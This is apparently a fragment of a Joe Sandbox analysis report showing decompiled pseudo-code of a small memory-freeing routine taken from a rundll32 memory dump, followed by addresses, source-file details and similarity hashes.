				_t15 = _t27;
				if (_t15 == 0) goto 0x288ed148;
				goto 0x288ed01f;
				if (_t15 == 0) goto 0x288ed05b;
				if ( *_t27 == 0) goto 0x288ed070;
				if ((__edx >> 0x00000002 >> 0x00000001 & 0x00000001) == 0) goto 0x288ed010;
				_t6 = E00007FFC7FFC288ECE60(_t12, _t13, __rax, __rcx,  *_t27, _t32);
				if (_t21 == 0) goto 0x288ed140;
				if (__rcx == 0) goto 0x288ed0e0;
				_t20 =  *((intOrPtr*)(__rcx + 8)) - 9;
				if (_t20 <= 0) goto 0x288ed0a0;
				free(??);
				if (_t20 != 0) goto 0x288ed014;
				return _t6;
			}











                                      0x7ffc288ecfc0
                                      0x7ffc288ecfd8
                                      0x7ffc288ecfe4
                                      0x7ffc288ecfe6
                                      0x7ffc288ecfed
                                      0x7ffc288ecff0
                                      0x7ffc288ed00a
                                      0x7ffc288ed012
                                      0x7ffc288ed01a
                                      0x7ffc288ed022
                                      0x7ffc288ed02a
                                      0x7ffc288ed035
                                      0x7ffc288ed03e
                                      0x7ffc288ed044
                                      0x7ffc288ed04a
                                      0x7ffc288ed052
                                      0x7ffc288ed059
                                      0x7ffc288ed06c

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CriticalLeaveSectionfree
                                      • String ID:
                                      • API String ID: 1679108487-0
                                      • Opcode ID: efd6d315a87f7d84d699918e636374ed1ab0ac31f2860f3c33c85e5f51e01751
                                      • Instruction ID: 0905b9178f4cddc5cfee4c1372c560c0765f941f2625c4a56dca914bbd9ee9eb
                                      • Opcode Fuzzy Hash: efd6d315a87f7d84d699918e636374ed1ab0ac31f2860f3c33c85e5f51e01751
                                      • Instruction Fuzzy Hash: DE416D21E09A3A81FA219B09DE1033A6291EF14B84F584037ED1D4F7C1EE2DB45EC278
                                      Uniqueness

                                      Uniqueness Score: -1.00%